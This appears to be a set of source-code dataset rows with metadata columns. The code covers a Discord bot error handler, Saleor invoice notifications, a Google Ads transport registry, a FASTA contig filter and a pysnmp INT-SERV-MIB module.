return await ctx.send(str(error))
if isinstance(error, commands.MissingPermissions):
perms = ", ".join(f"`{x}`" for x in error.missing_perms)
return await ctx.send(
f":warning: You require {perms} permission to use this command!"
)
elif isinstance(error, commands.BotMissingPermissions):
perms = ", ".join(f"`{x}`" for x in error.missing_perms)
return await ctx.send(
f":warning: Cannot execute command! Bot is missing permission {perms}"
)
elif isinstance(error, commands.CommandOnCooldown):
if db.is_patron(ctx.author.id, (2, 3)):
return await ctx.reinvoke()
else:
return await ctx.send(
f":hourglass: This command is on a cooldown! (`{error.retry_after:.2f}s` remaining)"
)
elif isinstance(error, commands.DisabledCommand):
await ctx.send(f":warning: `{ctx.command}` has been disabled!")
elif isinstance(error, commands.NoPrivateMessage):
await ctx.author.send(
":warning: You cannot use this command in private messages"
)
elif isinstance(error, util.PatronCheckFailure):
await ctx.send(":no_entry: Support me on patreon to use this command! <https://patreon.com/joinemm>")
elif isinstance(error, (commands.NotOwner, commands.CheckFailure)):
await ctx.send(
":warning: Sorry, you are not authorized to use this command!"
)
elif isinstance(error, exceptions.BlacklistTrigger):
if error.blacklist_type == "command":
message = "This command has been blacklisted by the server moderators"
elif error.blacklist_type == "channel":
message = "Command usage on this channel has been blacklisted by the server moderators"
elif error.blacklist_type == "user":
message = "You have been blacklisted from using commands by the server moderators"
elif error.blacklist_type == "global":
message = "You have been blacklisted from using Miso Bot"
delete = error.do_delete
await ctx.send(
f":no_entry_sign: `{message}`", delete_after=(5 if delete else None)
)
if delete:
await asyncio.sleep(5)
await ctx.message.delete()
elif isinstance(error, (commands.BadArgument, flags._parser.ArgumentParsingError)):
await ctx.send(f"```{str(error)}```")
elif isinstance(error, discord.errors.Forbidden):
try:
await ctx.send(f"```{str(error)}```")
except discord.errors.Forbidden:
try:
await ctx.message.add_reaction("🙊")
except discord.errors.Forbidden:
logger.error(str(error))
elif isinstance(error, exceptions.LastFMError):
await ctx.send(f"```{str(error)}```")
else:
traceback.print_exception(type(error), error, error.__traceback__)
await ctx.send(f"```\n{type(error).__name__}: {str(error)}```")
def setup(bot):
bot.add_cog(Events(bot))
| true
| true
|
790afdcdd7b5cfeedf70ea27145720e97263e4f9
| 1,445
|
py
|
Python
|
saleor/invoice/notifications.py
|
nestfiy/saleor
|
6fce3bc5c0ca72ac28db99553e6d2b49249c6dac
|
[
"CC-BY-4.0"
] | 1,392
|
2021-10-06T15:54:28.000Z
|
2022-03-31T20:50:55.000Z
|
saleor/invoice/notifications.py
|
nestfiy/saleor
|
6fce3bc5c0ca72ac28db99553e6d2b49249c6dac
|
[
"CC-BY-4.0"
] | 888
|
2021-10-06T10:48:54.000Z
|
2022-03-31T11:00:30.000Z
|
saleor/invoice/notifications.py
|
nestfiy/saleor
|
6fce3bc5c0ca72ac28db99553e6d2b49249c6dac
|
[
"CC-BY-4.0"
] | 538
|
2021-10-07T16:21:27.000Z
|
2022-03-31T22:58:57.000Z
|
from typing import TYPE_CHECKING, Optional
from ..core.notification.utils import get_site_context
from ..core.notify_events import NotifyEventType
from ..graphql.core.utils import to_global_id_or_none
if TYPE_CHECKING:
from ..account.models import User
from ..app.models import App
from ..plugins.manager import PluginsManager
from .models import Invoice
def get_invoice_payload(invoice):
return {
"id": to_global_id_or_none(invoice),
"number": invoice.number,
"download_url": invoice.url,
"order_id": to_global_id_or_none(invoice.order),
}
def send_invoice(
invoice: "Invoice",
staff_user: "User",
app: Optional["App"],
manager: "PluginsManager",
):
"""Send an invoice to user of related order with URL to download it."""
payload = {
"invoice": get_invoice_payload(invoice),
"recipient_email": invoice.order.get_customer_email(), # type: ignore
"requester_user_id": to_global_id_or_none(staff_user),
"requester_app_id": to_global_id_or_none(app) if app else None,
**get_site_context(),
}
channel_slug = None
if invoice.order and invoice.order.channel:
channel_slug = invoice.order.channel.slug
manager.notify(
NotifyEventType.INVOICE_READY, payload, channel_slug=channel_slug
) # type: ignore
manager.invoice_sent(invoice, invoice.order.get_customer_email()) # type: ignore
| 32.111111
| 85
| 0.703806
|
from typing import TYPE_CHECKING, Optional
from ..core.notification.utils import get_site_context
from ..core.notify_events import NotifyEventType
from ..graphql.core.utils import to_global_id_or_none
if TYPE_CHECKING:
from ..account.models import User
from ..app.models import App
from ..plugins.manager import PluginsManager
from .models import Invoice
def get_invoice_payload(invoice):
return {
"id": to_global_id_or_none(invoice),
"number": invoice.number,
"download_url": invoice.url,
"order_id": to_global_id_or_none(invoice.order),
}
def send_invoice(
invoice: "Invoice",
staff_user: "User",
app: Optional["App"],
manager: "PluginsManager",
):
payload = {
"invoice": get_invoice_payload(invoice),
"recipient_email": invoice.order.get_customer_email(),
"requester_user_id": to_global_id_or_none(staff_user),
"requester_app_id": to_global_id_or_none(app) if app else None,
**get_site_context(),
}
channel_slug = None
if invoice.order and invoice.order.channel:
channel_slug = invoice.order.channel.slug
manager.notify(
NotifyEventType.INVOICE_READY, payload, channel_slug=channel_slug
)
manager.invoice_sent(invoice, invoice.order.get_customer_email())
| true
| true
|
790aff716ab055d6948c46123148d87a7e4705e8
| 1,069
|
py
|
Python
|
google/ads/googleads/v8/services/services/hotel_group_view_service/transports/__init__.py
|
wxxlouisa/google-ads-python
|
f24137966f6bfcb765a9b1fae79f2d23041825fe
|
[
"Apache-2.0"
] | 285
|
2018-10-05T16:47:58.000Z
|
2022-03-31T00:58:39.000Z
|
google/ads/googleads/v8/services/services/hotel_group_view_service/transports/__init__.py
|
wxxlouisa/google-ads-python
|
f24137966f6bfcb765a9b1fae79f2d23041825fe
|
[
"Apache-2.0"
] | 425
|
2018-09-10T13:32:41.000Z
|
2022-03-31T14:50:05.000Z
|
google/ads/googleads/v8/services/services/hotel_group_view_service/transports/__init__.py
|
wxxlouisa/google-ads-python
|
f24137966f6bfcb765a9b1fae79f2d23041825fe
|
[
"Apache-2.0"
] | 369
|
2018-11-28T07:01:00.000Z
|
2022-03-28T09:53:22.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from typing import Dict, Type
from .base import HotelGroupViewServiceTransport
from .grpc import HotelGroupViewServiceGrpcTransport
# Compile a registry of transports.
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[HotelGroupViewServiceTransport]]
_transport_registry["grpc"] = HotelGroupViewServiceGrpcTransport
__all__ = (
"HotelGroupViewServiceTransport",
"HotelGroupViewServiceGrpcTransport",
)
| 31.441176
| 74
| 0.77362
|
from collections import OrderedDict
from typing import Dict, Type
from .base import HotelGroupViewServiceTransport
from .grpc import HotelGroupViewServiceGrpcTransport
_transport_registry = (
OrderedDict()
)
_transport_registry["grpc"] = HotelGroupViewServiceGrpcTransport
__all__ = (
"HotelGroupViewServiceTransport",
"HotelGroupViewServiceGrpcTransport",
)
| true
| true
|
790aff9d5310c04a944f7830aa3dbdbd7daeda78
| 467
|
py
|
Python
|
filter_contigs.py
|
MullinsLab/HHV8-assembly-SPades
|
74f5853bd1e7c1af7f306343ebcd9ac919fda92f
|
[
"MIT"
] | 7
|
2016-10-05T23:43:33.000Z
|
2021-07-06T18:36:41.000Z
|
filter_contigs.py
|
MullinsLab/HHV8-assembly-SPades
|
74f5853bd1e7c1af7f306343ebcd9ac919fda92f
|
[
"MIT"
] | 1
|
2015-11-25T07:14:24.000Z
|
2016-01-28T15:07:41.000Z
|
filter_contigs.py
|
MullinsLab/HHV8-assembly-SPades
|
74f5853bd1e7c1af7f306343ebcd9ac919fda92f
|
[
"MIT"
] | 4
|
2016-10-11T17:34:51.000Z
|
2020-03-16T14:26:36.000Z
|
#!/usr/bin/env python
import sys
from Bio import SeqIO
min_length, fasta_file_path = sys.argv[1:]
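# Copy contigs of at least min_length bases into a new FASTA file whose name is
# derived from the input path by replacing 'fa' with 'filter<min_length>.fa'.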
with open(fasta_file_path.replace('fa', 'filter{}.fa'.format(min_length)), 'w') as filtered_fasta:
with open(fasta_file_path, 'rU') as input_fasta:
def filtered_contigs_generator(min):
for contig in SeqIO.parse(input_fasta, 'fasta'):
if len(contig) >= min:
yield contig
SeqIO.write(filtered_contigs_generator(int(min_length)), filtered_fasta, 'fasta')
| 38.916667
| 98
| 0.745182
|
import sys
from Bio import SeqIO
min_length, fasta_file_path = sys.argv[1:]
with open(fasta_file_path.replace('fa', 'filter{}.fa'.format(min_length)), 'w') as filtered_fasta:
with open(fasta_file_path, 'rU') as input_fasta:
def filtered_contigs_generator(min):
for contig in SeqIO.parse(input_fasta, 'fasta'):
if len(contig) >= min:
yield contig
SeqIO.write(filtered_contigs_generator(int(min_length)), filtered_fasta, 'fasta')
| true
| true
|
790affc4694b91c99c2711674937cfa282c5fc8f
| 25,716
|
py
|
Python
|
pysnmp-with-texts/INT-SERV-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/INT-SERV-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/INT-SERV-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module INT-SERV-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/INT-SERV-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:18:45 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint")
InterfaceIndex, ifIndex = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex", "ifIndex")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, Counter32, IpAddress, ModuleIdentity, Unsigned32, MibIdentifier, NotificationType, Integer32, TimeTicks, Bits, mib_2, iso, Gauge32, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "Counter32", "IpAddress", "ModuleIdentity", "Unsigned32", "MibIdentifier", "NotificationType", "Integer32", "TimeTicks", "Bits", "mib-2", "iso", "Gauge32", "ObjectIdentity")
DisplayString, TruthValue, RowStatus, TestAndIncr, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "RowStatus", "TestAndIncr", "TextualConvention")
intSrv = ModuleIdentity((1, 3, 6, 1, 2, 1, 52))
if mibBuilder.loadTexts: intSrv.setLastUpdated('9710030642Z')
if mibBuilder.loadTexts: intSrv.setOrganization('IETF Integrated Services Working Group')
if mibBuilder.loadTexts: intSrv.setContactInfo(' Fred Baker Postal: Cisco Systems 519 Lado Drive Santa Barbara, California 93111 Tel: +1 805 681 0115 E-Mail: fred@cisco.com John Krawczyk Postal: ArrowPoint Communications 235 Littleton Road Westford, Massachusetts 01886 Tel: +1 508 692 5875 E-Mail: jjk@tiac.net')
if mibBuilder.loadTexts: intSrv.setDescription('The MIB module to describe the Integrated Services Protocol')
intSrvObjects = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 1))
intSrvGenObjects = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 2))
intSrvNotifications = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 3))
intSrvConformance = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4))
class SessionNumber(TextualConvention, Integer32):
description = 'The Session Number convention is used for numbers identifying sessions or saved PATH or RESV information. It is a number in the range returned by a TestAndIncr variable, having no protocol meaning whatsoever but serving instead as simple identifier. The alternative was a very complex instance or instance object that became unwieldy.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class Protocol(TextualConvention, Integer32):
description = 'The value of the IP Protocol field of an IP Datagram Header. This identifies the protocol layer above IP. For example, the value 6 is used for TCP and the value 17 is used for UDP. The values of this field are defined in the As- signed Numbers RFC.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 255)
class SessionType(TextualConvention, Integer32):
description = "The value of the C-Type field of a Session ob- ject, as defined in the RSVP specification. This value determines the lengths of octet strings and use of certain objects such as the 'port' variables. If the C-Type calls for an IP6 address, one would expect all source, des- tination, and next/previous hop addresses to be 16 bytes long, and for the ports to be UDP/TCP port numbers, for example."
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 255)
class Port(TextualConvention, OctetString):
description = 'The value of the UDP or TCP Source or Destina- tion Port field, a virtual destination port or generalized port identifier used with the IPSEC Authentication Header or Encapsulating Security Payload, or other session discriminator. If it is not used, the value should be of length 0. This pair, when coupled with the IP Addresses of the source and destination system and the IP protocol field, uniquely identifies a data stream.'
status = 'current'
displayHint = 'd'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(2, 4)
class MessageSize(TextualConvention, Integer32):
description = 'The size of a message in bytes. This is used to specify the minimum and maximum size of a message along an integrated services route.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class BitRate(TextualConvention, Integer32):
description = 'The rate, in bits/second, that data may move in the context. Applicable contexts minimally include the speed of an interface or virtual circuit, the data rate of a (potentially aggre- gated) data flow, or the data rate to be allo- cated for use by a flow.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class BurstSize(TextualConvention, Integer32):
description = 'The number of octets of IP Data, including IP Headers, that a stream may send without concern for policing.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class QosService(TextualConvention, Integer32):
description = 'The class of service in use by a flow.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 5))
namedValues = NamedValues(("bestEffort", 1), ("guaranteedDelay", 2), ("controlledLoad", 5))
intSrvIfAttribTable = MibTable((1, 3, 6, 1, 2, 1, 52, 1, 1), )
if mibBuilder.loadTexts: intSrvIfAttribTable.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribTable.setDescription("The reservable attributes of the system's in- terfaces.")
intSrvIfAttribEntry = MibTableRow((1, 3, 6, 1, 2, 1, 52, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: intSrvIfAttribEntry.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribEntry.setDescription('The reservable attributes of a given inter- face.')
intSrvIfAttribAllocatedBits = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 1), BitRate()).setUnits('Bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBits.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBits.setDescription('The number of bits/second currently allocated to reserved sessions on the interface.')
intSrvIfAttribMaxAllocatedBits = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 2), BitRate()).setUnits('Bits per second').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribMaxAllocatedBits.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribMaxAllocatedBits.setDescription('The maximum number of bits/second that may be allocated to reserved sessions on the inter- face.')
intSrvIfAttribAllocatedBuffer = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 3), BurstSize()).setUnits('Bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBuffer.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBuffer.setDescription('The amount of buffer space required to hold the simultaneous burst of all reserved flows on the interface.')
intSrvIfAttribFlows = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribFlows.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribFlows.setDescription('The number of reserved flows currently active on this interface. A flow can be created ei- ther from a reservation protocol (such as RSVP or ST-II) or via configuration information.')
intSrvIfAttribPropagationDelay = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 5), Integer32()).setUnits('microseconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribPropagationDelay.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribPropagationDelay.setDescription('The amount of propagation delay that this in- terface introduces in addition to that intro- diced by bit propagation delays.')
intSrvIfAttribStatus = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 6), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribStatus.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribStatus.setDescription("'active' on interfaces that are configured for RSVP.")
intSrvFlowTable = MibTable((1, 3, 6, 1, 2, 1, 52, 1, 2), )
if mibBuilder.loadTexts: intSrvFlowTable.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowTable.setDescription("Information describing the reserved flows us- ing the system's interfaces.")
intSrvFlowEntry = MibTableRow((1, 3, 6, 1, 2, 1, 52, 1, 2, 1), ).setIndexNames((0, "INT-SERV-MIB", "intSrvFlowNumber"))
if mibBuilder.loadTexts: intSrvFlowEntry.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowEntry.setDescription('Information describing the use of a given in- terface by a given flow. The counter intSrvFlowPoliced starts counting at the in- stallation of the flow.')
intSrvFlowNumber = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 1), SessionNumber())
if mibBuilder.loadTexts: intSrvFlowNumber.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowNumber.setDescription('The number of this flow. This is for SNMP In- dexing purposes only and has no relation to any protocol value.')
intSrvFlowType = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 2), SessionType()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowType.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowType.setDescription('The type of session (IP4, IP6, IP6 with flow information, etc).')
intSrvFlowOwner = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("rsvp", 2), ("management", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowOwner.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowOwner.setDescription('The process that installed this flow in the queue policy database.')
intSrvFlowDestAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestAddr.setDescription("The destination address used by all senders in this session. This object may not be changed when the value of the RowStatus object is 'ac- tive'.")
intSrvFlowSenderAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowSenderAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowSenderAddr.setDescription("The source address of the sender selected by this reservation. The value of all zeroes in- dicates 'all senders'. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowDestAddrLength = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 128))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestAddrLength.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestAddrLength.setDescription("The length of the destination address in bits. This is the CIDR Prefix Length, which for IP4 hosts and multicast addresses is 32 bits. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowSenderAddrLength = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 128))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowSenderAddrLength.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowSenderAddrLength.setDescription("The length of the sender's address in bits. This is the CIDR Prefix Length, which for IP4 hosts and multicast addresses is 32 bits. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowProtocol = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 8), Protocol()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowProtocol.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowProtocol.setDescription("The IP Protocol used by a session. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowDestPort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 9), Port()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestPort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestPort.setDescription("The UDP or TCP port number used as a destina- tion port for all senders in this session. If the IP protocol in use, specified by intSrvResvFwdProtocol, is 50 (ESP) or 51 (AH), this represents a virtual destination port number. A value of zero indicates that the IP protocol in use does not have ports. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowPort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 10), Port()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowPort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowPort.setDescription("The UDP or TCP port number used as a source port for this sender in this session. If the IP protocol in use, specified by intSrvResvFwdProtocol is 50 (ESP) or 51 (AH), this represents a generalized port identifier (GPI). A value of zero indicates that the IP protocol in use does not have ports. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowFlowId = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowFlowId.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowFlowId.setDescription('The flow ID that this sender is using, if this is an IPv6 session.')
intSrvFlowInterface = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 12), InterfaceIndex()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowInterface.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowInterface.setDescription('The ifIndex value of the interface on which this reservation exists.')
intSrvFlowIfAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 13), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowIfAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowIfAddr.setDescription('The IP Address on the ifEntry on which this reservation exists. This is present primarily to support those interfaces which layer multi- ple IP Addresses on the interface.')
intSrvFlowRate = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 14), BitRate()).setUnits('bits per second').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowRate.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowRate.setDescription("The Reserved Rate of the sender's data stream. If this is a Controlled Load service flow, this rate is derived from the Tspec rate parameter (r). If this is a Guaranteed service flow, this rate is derived from the Rspec clearing rate parameter (R).")
intSrvFlowBurst = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 15), BurstSize()).setUnits('bytes').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowBurst.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowBurst.setDescription("The size of the largest burst expected from the sender at a time. If this is less than the sender's advertised burst size, the receiver is asking the network to provide flow pacing beyond what would be provided under normal circumstances. Such pac- ing is at the network's option.")
intSrvFlowWeight = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 16), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowWeight.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowWeight.setDescription('The weight used to prioritize the traffic. Note that the interpretation of this object is implementation-specific, as implementations vary in their use of weighting procedures.')
intSrvFlowQueue = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 17), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowQueue.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowQueue.setDescription('The number of the queue used by this traffic. Note that the interpretation of this object is implementation-specific, as implementations vary in their use of queue identifiers.')
intSrvFlowMinTU = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 18), MessageSize()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowMinTU.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowMinTU.setDescription('The minimum message size for this flow. The policing algorithm will treat smaller messages as though they are this size.')
intSrvFlowMaxTU = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 19), MessageSize()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowMaxTU.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowMaxTU.setDescription('The maximum datagram size for this flow that will conform to the traffic specification. This value cannot exceed the MTU of the interface.')
intSrvFlowBestEffort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowBestEffort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowBestEffort.setDescription('The number of packets that were remanded to best effort service.')
intSrvFlowPoliced = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 21), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowPoliced.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowPoliced.setDescription("The number of packets policed since the incep- tion of the flow's service.")
intSrvFlowDiscard = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 22), TruthValue().clone('false')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDiscard.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDiscard.setDescription("If 'true', the flow is to incur loss when traffic is policed. If 'false', policed traff- ic is treated as best effort traffic.")
intSrvFlowService = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 23), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowService.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowService.setDescription('The QoS service being applied to this flow.')
intSrvFlowOrder = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 24), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowOrder.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowOrder.setDescription('In the event of ambiguity, the order in which the classifier should make its comparisons. The row with intSrvFlowOrder=0 is tried first, and comparisons proceed in the order of in- creasing value. Non-serial implementations of the classifier should emulate this behavior.')
intSrvFlowStatus = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 25), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowStatus.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowStatus.setDescription("'active' for all active flows. This object may be used to install static classifier infor- mation, delete classifier information, or au- thorize such.")
intSrvFlowNewIndex = MibScalar((1, 3, 6, 1, 2, 1, 52, 2, 1), TestAndIncr()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: intSrvFlowNewIndex.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowNewIndex.setDescription("This object is used to assign values to intSrvFlowNumber as described in 'Textual Con- ventions for SNMPv2'. The network manager reads the object, and then writes the value back in the SET that creates a new instance of intSrvFlowEntry. If the SET fails with the code 'inconsistentValue', then the process must be repeated; If the SET succeeds, then the ob- ject is incremented, and the new instance is created according to the manager's directions.")
intSrvGroups = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4, 1))
intSrvCompliances = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4, 2))
intSrvCompliance = ModuleCompliance((1, 3, 6, 1, 2, 1, 52, 4, 2, 1)).setObjects(("INT-SERV-MIB", "intSrvIfAttribGroup"), ("INT-SERV-MIB", "intSrvFlowsGroup"), ("INT-SERV-MIB", "intSrvGenObjectsGroup"))
